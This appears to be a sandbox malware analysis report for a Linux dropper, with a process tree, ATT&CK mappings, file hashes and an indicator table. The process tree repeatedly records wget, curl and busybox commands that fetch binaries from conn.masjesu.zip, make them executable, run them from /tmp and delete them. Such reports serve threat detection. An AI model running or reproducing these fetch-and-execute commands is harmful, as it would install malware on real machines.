- /tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  ./cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  - Executes dropped EXE
  PID:985
- /bin/rm
  rm cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
  2⤵
  PID:986
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - System Network Configuration Discovery
  PID:987
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:988
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  PID:990
- /bin/chmod
  chmod 777 puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - File and Directory Permissions Modification
  PID:991
- /tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  ./puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  - Executes dropped EXE
  PID:992
- /bin/rm
  rm puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
  2⤵
  PID:993
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - System Network Configuration Discovery
  PID:994
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:995
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - System Network Configuration Discovery
  PID:997
- /bin/chmod
  chmod 777 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - File and Directory Permissions Modification
  PID:998
- /tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  ./0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  - Executes dropped EXE
  PID:999
- /bin/rm
  rm 0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
  2⤵
  PID:1000
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - System Network Configuration Discovery
  PID:1001
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1002
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - System Network Configuration Discovery
  PID:1004
- /bin/chmod
  chmod 777 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - File and Directory Permissions Modification
  PID:1005
- /tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  ./4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  - Executes dropped EXE
  PID:1006
- /bin/rm
  rm 4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
  2⤵
  PID:1007
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - System Network Configuration Discovery
  PID:1008
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1009
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  PID:1011
- /bin/chmod
  chmod 777 NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - File and Directory Permissions Modification
  PID:1012
- /tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  ./NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  - Executes dropped EXE
  PID:1013
- /bin/rm
  rm NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
  2⤵
  PID:1014
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - System Network Configuration Discovery
  PID:1015
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1016
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  PID:1018
- /bin/chmod
  chmod 777 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - File and Directory Permissions Modification
  PID:1019
- /tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  ./9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  - Executes dropped EXE
  PID:1020
- /bin/rm
  rm 9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
  2⤵
  PID:1021
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - System Network Configuration Discovery
  PID:1022
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1023
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - System Network Configuration Discovery
  PID:1025
- /bin/chmod
  chmod 777 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - File and Directory Permissions Modification
  PID:1026
- /tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  ./3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  - Executes dropped EXE
  PID:1027
- /bin/rm
  rm 3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
  2⤵
  PID:1029

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC

Filesize
176B

MD5
e1732e70f015e99d14dff1eeeaec9966

SHA1
c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113

SHA256
6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e

SHA512
6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Download Submit
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H	745	cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM	752	puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag	769	0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE	798	4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x	818	NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw	835	9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC	862	3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC
/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn	870	YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD	881	Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj	889	rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA	897	dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz	905	6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H	913	kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak	921	RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
/tmp/YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn	929	YwSUvCec9q8gc41nfzeiXwzkMn8Nq8n3hn
/tmp/Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD	937	Lh2VyTvE38G358nKR0pAm7v13fNboIZkvD
/tmp/rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj	945	rVNWBXPrQnMfD9Y0car7OQxiZP9IGoz5Rj
/tmp/dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA	953	dvlWoV3qBd0psuUA5wRiIkW7a9thVeQVFA
/tmp/6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz	961	6ieDpOHtDrLDwvrOgEcnV7BJMYx3R6YmTz
/tmp/kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H	969	kKqp2zs0qRrwt7d3vUV4LgDUl0MOMwxx6H
/tmp/RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak	977	RtSSG9LvGCmqzg4OVFcgtzXWvMtm7wpBak
/tmp/cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H	985	cE6gCRJyPydWInd0OPFAyGsRVqggUSLC7H
/tmp/puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM	992	puqT6KBCK9MSCHK7dYXzKCco8G7mO9hoKM
/tmp/0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag	999	0xceySme7LHjzSm0EJaBNi3Bry8sCF6yag
/tmp/4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE	1006	4ckX95w4lHPdrwJ3yAwoR8Ywh5lfuwf1XE
/tmp/NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x	1013	NEVGAwgHhi00XyaN21rJdWQh932NvVFE3x
/tmp/9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw	1020	9UCfEDeKNNvQZPrKraQHcGW0h68jwwaKIw
/tmp/3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC	1027	3KfNxfD5SAiRsK19JLqOmoNbAYIQ6RraRC